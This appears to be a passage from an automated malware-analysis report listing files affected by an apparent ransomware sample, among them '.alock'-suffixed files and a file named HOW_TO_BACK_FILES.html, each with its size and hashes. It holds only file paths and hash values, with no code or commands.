e13f93f796127855f57a9820f3a89bf548919622887c14e234707737142daa20

SHA512
8a92f0f3e52a18ef68960d763b350614e40a1ab1dcb43ea0cd75567eaec2f09073b1e46584b7f7528b2cc2ae86251a0ab236c1517a5c8d9ba4bbcacda09572b8

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif

Filesize
1KB

MD5
2d96db248bc5b640f4bcaaa315678897

SHA1
a7d506420898c721546c8586e764b40fc19e594d

SHA256
7f3cfc6e31435049028ace042cb44ca1f4c85c63e94ce7f35d8316a14f8f2fa1

SHA512
61a2cfc49b1a5ce0f112a6391fb6dbbc9ff3dbd597b49b6d0c8d72c793b111ad82acb1d7d9729f699445e454d72a3eb90fce825dbc314c4e3a782dc424436791

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_LightSpirit.gif

Filesize
9KB

MD5
35be4fb3e2a15997b99c9201419504ea

SHA1
15e949bbc9f0a30439aa17a0b70bb9f258ee9768

SHA256
0d66519170f0473abd9711fee88ac347e01386f443f62e6844c663c28084d52e

SHA512
61ce243f5c174989d6dea6cbf6206e8172c1f1dc9ecb7fe5c7a88f38ebe1132a78140c5f08aacbf3cefe0917a20f1cdbc5814c6cfdcd395e0d7381b52977d65a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif.alock

Filesize
21KB

MD5
00b4bd844183f89ec272d6c8ff09a700

SHA1
de702a1feef3dc9d8e1764c8eb794cb38ff4240f

SHA256
8cb7a30751014f32107ecca3d3d083e6743267e1d939fd31a68ae333557a081e

SHA512
a9cd3cf39c09da809f26c4896b1a632454c60adb5aae5f22060900233619a61ab7580f68db6018b68b735958710f24dd3b0ad1afc27239dd9e74cabf6a283cfc

Download Submit
C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.alock

Filesize
7KB

MD5
c5b3b88e5ac3116af554fb285e9fad49

SHA1
e0ca6670d781e1539f77f4f2c5c7744a209e7e84

SHA256
619a10965105c31949023d2f544713d33181fb22157d9c3a7143e453e14ca58b

SHA512
a72517f610871d5a5739b2ac966873a91e60fc39107205399f7e59ad32ab103803aa51047925a164a12b539230072ceed24076d8383b59cc1029b16a379deceb

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif

Filesize
1KB

MD5
d19a436be7066c45872f2d640fcd5714

SHA1
acbbe4d3ed0166a64e8eea582130a8362f9a70e5

SHA256
fbf70234d8e88a83a8c36389a0261944a180314ff2090b120f338e0806e0a364

SHA512
3f064fe442a326e5abc53b2e7ec32d9aed616f60579df7cf0afecce15796d4d3ec0d8c5a7710f159ff02adff7d3e86b30851e3d900bdfe7c87575e2121f52deb

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT

Filesize
1KB

MD5
3c009b5381a19f845f9355d4f0386eb9

SHA1
2894d84a69df56c0bab9d85f23fb9880eb6e7ba4

SHA256
faa55099eee187114c1b559db18698446fbd1c32050dedee7bf0b6d3d9c9bc1d

SHA512
de6b8eaa02b6697a785e447eec7ca1cbedaae20528a7a1eb6f9fedcd9021f6c9b2279a9b318636e51bf3d2134a92afb06243596e0a9ad0d78705b57b7755b9e7

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5

Filesize
1KB

MD5
41eb92e23e159d014edb84eaa98724dd

SHA1
df72e649faa91d0d2596c61c0aa5243b7d25f5f5

SHA256
ce84bbce8feab6f4648a11c492a0b2a8f4112a82d44e230c89e830108fd54471

SHA512
537a424d110cb599b0794143aeb8eea919ba690952b8519356eae2dcc72c58cfc719854272a7e4a7c637a5d92aba39870f98d595f59ab6043a1531294ee3ecff

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10

Filesize
1KB

MD5
bdb70395dbef73ed0694635ab8194ebb

SHA1
de80cce1e4b36b1bb72b81b2ce490a75e3528b6a

SHA256
c8295d184547967ed848a9b7512d96c3808a6b554630649771b4600a8398061d

SHA512
f4d7fcadc391e1b46032ddde2a05e232f410903ea6f513ceb7996cdba2e492ccce1c7d37031ec776966f19d978111576c8984175f683e4da4dcb0ac369ef078b

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7

Filesize
1KB

MD5
b0df079a34b09cae9ba99e0e5fb1847e

SHA1
d2c2e4d373a30e2e89311d8aea114aa68222de90

SHA256
12fbde744dee2f3623b6040ea275301823eb4f089f9e4b77e6ea31b63ae88dc7

SHA512
910b75ad9ff680ff2a93b830b7d59c3fbb1d53960746a24b035c25f6a00cdba4c4d6f479f2e9856c73d07bacba0d709f93d62ec2a9a7eecd5c4deec518471319

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html

Filesize
13KB

MD5
6629f9a2cd3db81ee6350a63728a1954

SHA1
7fb0c74593fe159b16c5c4e7549ffa4e07d71722

SHA256
3bc1754f3aec9f564e1eeeef9e20f2ebf8fd809504bc4e5a7e9b0bb00fa7f533

SHA512
d7167c6e24e702fa79be5e33b3ea0599862e77c6b91ee73142b5ce8667037135b3bcc478e6a394d29891f41a00790ec372313799aa41735cbb4856b6ade9359d

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html

Filesize
10KB

MD5
671ce84bb50e8e40319fa8949792313a

SHA1
c4508d5803cf17ed5d25247518bf54741a68eda7

SHA256
a42e1e47b8f132658d3a7b65f35c225163ae68232df486eb22efa43b48aba720

SHA512
23dc0cda448f2473bc34a82077b395e7456e5c228e65a4c3b2c3192e46a81ba24443e99a1728b91067bd75383c0e9f1fa89f311b095eba9dcb3f49103876c91c

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf

Filesize
1KB

MD5
ce366055d8ed95eeaa544ad45fa832c4

SHA1
3c5d65b47d756ddf9dee903fc9babb6e4f01b66d

SHA256
2459f06af799ec386882f778633ad3dfb7c4f4c734249391aaea8f5fc757a929

SHA512
9c602c1d39161162cfe716b5799433475735bfcdc5cb3be71cf452c1439b494b0477e95d61103d3112505cede1e66a8ed5c6506470a8dc95f1c4f3eaecf8dfce

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
1168f86a0f7cb123cbe6b6355ba31650

SHA1
7db7c8990824bf2ea64918c67937c80d02b8368b

SHA256
9daabef1703652974ab3578b4566a1db07f3d8a67babf997e76387210edd6011

SHA512
bc0834032b7dccb7d15100f6643be91660f88112e5509c71b305d5453082cdd8a86ad77ea72fd8f7ac19dbf4b3c8ae8bf5fb269603b1d10a9fd801678d513d4e

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

Filesize
12KB

MD5
26453ad9071ac4021bf34b5252ce1b0e

SHA1
a7ee708eb35ea4c390947d2858f7782b4bf1c149

SHA256
8b9afafbf88cdd33a573d5a7fa278570d57007c962fc7ceec695691165ee70ad

SHA512
918340a60543f55af7bf6acc1a1340d8eea8fd594c7dfdf38dbffe17c2be7a98e5354d389a448734cb8816befefe1347dc1608787d12f2aa3f3a9989c868ae21

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
73d68bdf720e648c264fa5ec7c918a78

SHA1
35e8f15016b605b835044a433850b75238c69d51

SHA256
1eb41bc9582b29167fb49800683850aa0e381ea801040d895bba77ea183a4e52

SHA512
f044c8c06b2ff66376c0bc31c203c4401cd5a73fb7c1c44fd598e116a8c75cc594dcc026905d5f0c95188e52b6fb0cb7fbdf2cd11c6b7cd7eed7433e998a7cbf

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF

Filesize
1KB

MD5
f54405a21c70fd3ca47d6a24900c1e30

SHA1
ff1f7ac4e6143e99495631097de411ab02290c46

SHA256
55634b19de394a87c8dc8a6648da25cd59d77c2b38bd884528477dfd3ed4b435

SHA512
93fd05f20ee5f8c8280b25b340422c919c54c50dd758ab871db9bb16611e55d85fc6d7efb82950253df161964c6ab13433c15ffd0a609a32eb87c1214daae758

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-api-visual.xml_hidden

Filesize
1KB

MD5
033a9fde9d4b7b58db1aae348a1841e2

SHA1
00fd06ab26fb08ba6adf40c9bfcae1b7dc81a1df

SHA256
77fda3ecf5a333b883196610c4264ef7624bee5a78b99357a089b318cbd92851

SHA512
c1dda93217b2ddf791ebf90ec56ddf55f0dfe0be4199c36c0acced9bb3808fc84efffd49142121c4131dc5e007ea103b8d001f3ea559228d0aee5b696322844c

Download Submit
C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif

Filesize
1KB

MD5
f9e939646c69887dd2b657de5bca504a

SHA1
b476466e848cf1cd33f1df45f8ca5e159fb09adf

SHA256
6347222c047d164a6f3578c8081a78d92e1ffbee00832b0a890844b5f0fd4874

SHA512
d147903f446260f3141b934707dde8d90f9df7faebbea0b9cb4077ad2b59df3ce97019b6972b9d673e16b3620d4d48f95d8a25028f824695803ae9e950737e46

Download Submit
C:\Program Files\Java\jre7\lib\zi\Etc\UTC

Filesize
1KB

MD5
88f6941e7a2bdf6cbc2476c810a7d7df

SHA1
a08b45da19a0140f28c70b19040bef35a5635719

SHA256
ec1ba51eb55ca9676170f03b814db95f6b0835a59690741645202fc8fbb5a22c

SHA512
23c6af9003d360b0f273eb02d36484f85a952c99bb7638b90ec93b184f7c6d2916950b2fbfb5eaf69a17ba3c74aefad3468f7184d76b8a54c70c7e18bd8c47c2

Download Submit
C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo

Filesize
609KB

MD5
969e6384af83f6427bf74b833d0acfb8

SHA1
cb522263a64edffa4ae3aa636bbd8a9b4d1ed259

SHA256
bdb8d74cc1bfbc6aeacecdf2336eb5f995d110689fb715ba54e8992193eb7ab8

SHA512
2ffc023d7eb5612ab24fdb84af604a6ba18dade02d56be68df96459bb2bf3c54d0327fee553bafcd59ad73663222fff9ec2084301117ff633e298f47303415b9

Download Submit
C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo

Filesize
599KB

MD5
8e4dc56d034158f9cd79ff7ed9ecd594

SHA1
031be258f74cdbd12da9d00acda6b6f7083c2e01

SHA256
7714c27f7145c40fa12c3e63799274232b995d66d6bcb61ced5433479d15ceac

SHA512
af41b2153d632df0470b0395858bf5e30fd2a4419fe08d53588036581174f7c94387601fcaf53065e87d187689f40ddd52163f30cdd24aa783f44d8a44f4f114

Download Submit
F:\HOW_TO_BACK_FILES.html

Filesize
5KB

MD5
2f36731806900feb27dc80ea4455b52b

SHA1
323b1db787779be90cedd08553d6cbf4d5c08c11

SHA256
9f2e559a8994c935ee6743e6c17e3d0823ed0fe44c20c22f41f1a822f9a74715

SHA512
1f9e2bc385b294b9065f57e5b09df6f59be39df65dd6255579b5d7c59b93f7bdb736f275fa9293d65951b77ebf202b605d61a728c29a84c9e0e122748ce14929

Download Submit